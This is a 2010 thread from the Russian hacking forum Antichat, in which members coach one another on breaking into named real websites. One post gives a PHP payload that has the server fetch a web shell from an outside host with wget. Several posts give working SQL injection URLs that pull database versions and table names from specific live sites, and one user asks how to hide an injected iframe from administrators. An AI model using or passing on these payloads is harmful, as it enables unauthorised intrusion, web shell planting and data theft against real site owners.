HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.03.2010, 17:32
-=Razor=-
Новичок
Регистрация: 20.12.2008
Сообщений: 24
С нами: 9152742

Репутация: 62
По умолчанию

Harvard, читай, все идеально расписано http://forum.antichat.ru/thread43966.html

daniel_1024, да ,попробуй замени : "User-Agent", своим шеллом. Для заливки полноценного шелла, отправь такой запрос
PHP код:
<?php system('wget http://site.ru/shell.php'); ?>

Последний раз редактировалось -=Razor=-; 21.03.2010 в 17:56..
 
Ответить с цитированием

  #2  
Старый 21.03.2010, 20:05
psQs
Новичок
Регистрация: 06.03.2010
Сообщений: 4
С нами: 8517582

Репутация: 0
По умолчанию

http://www.znania.ru/dbxhigh.asp?id=1'
как узнать версию?
http://www.znania.ru/dbxhigh.asp?id=1+or+1=version@@-- не работает. там фильтрация какая то или что?
 
Ответить с цитированием

  #3  
Старый 21.03.2010, 20:08
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию

Цитата:
Сообщение от psQs  
http://www.znania.ru/dbxhigh.asp?id=1'
как узнать версию?
http://www.znania.ru/dbxhigh.asp?id=1+or+1=version@@-- не работает. там фильтрация какая то или что?
во первых:
http://www.znania.ru/dbxhigh.asp?id=1+or+1=@@version
а во вторых
http://www.znania.ru/dbxhigh.asp?id=1+and+ascii(substring(@@version),1, 1)=53
 
Ответить с цитированием

  #4  
Старый 21.03.2010, 21:18
psQs
Новичок
Регистрация: 06.03.2010
Сообщений: 4
С нами: 8517582

Репутация: 0
По умолчанию

Цитата:
Сообщение от Seravin  
во первых:
http://www.znania.ru/dbxhigh.asp?id=1+or+1=@@version
а во вторых
http://www.znania.ru/dbxhigh.asp?id=1+and+ascii(substring(@@version),1, 1)=53
не работает почему то
 
Ответить с цитированием

  #5  
Старый 21.03.2010, 22:08
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами: 8603287

Репутация: 87
По умолчанию

Цитата:
Сообщение от psQs  
не работает почему то
Код:
http://www.znania.ru/dbxhigh.asp?id=1+AND+ascii%28substring%28%28select+table_name+from+information_schema.tables%29,1,1%29%29%3E117
хмм.. Could not find file 'c:\windows\system32\inetsrv\information_schema.md b'.
 
Ответить с цитированием

  #6  
Старый 21.03.2010, 20:59
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
С нами: 9567396

Репутация: 23
По умолчанию

После установки айфрейма и загрузки страницы с ним, браузер будет писать что-то вроде Sending request to iframelink.com. Внимательный админ это сразу заметит.
Есть способы скрытия обращения к странице, указанной в айфрейме?
 
Ответить с цитированием

  #7  
Старый 22.03.2010, 13:09
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами: 8797559

Репутация: -16
По умолчанию

Цитата:
http://www.ceylinco-insurance.com/products.php?id=1

поjaлуста , что мойно зделать ?
 
Ответить с цитированием

  #8  
Старый 22.03.2010, 13:18
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Код:
http://www.ceylinco-insurance.com/products.php?id=(select*from(select+name_const(version(),1),name_const(version(),1))a)
 
Ответить с цитированием

  #9  
Старый 22.03.2010, 15:51
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами: 8797559

Репутация: -16
По умолчанию

Pashkela :

Спасибо , а как дальше ?

Или есть статя об етом методе ?
 
Ответить с цитированием

  #10  
Старый 22.03.2010, 17:43
-=Razor=-
Новичок
Регистрация: 20.12.2008
Сообщений: 24
С нами: 9152742

Репутация: 62
По умолчанию

LokbatanLi,юзай поиск... Читай : http://forum.antichat.ru/thread43966.html https://forum.antichat.ru/thread104591.html

Последний раз редактировалось -=Razor=-; 22.03.2010 в 17:50..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.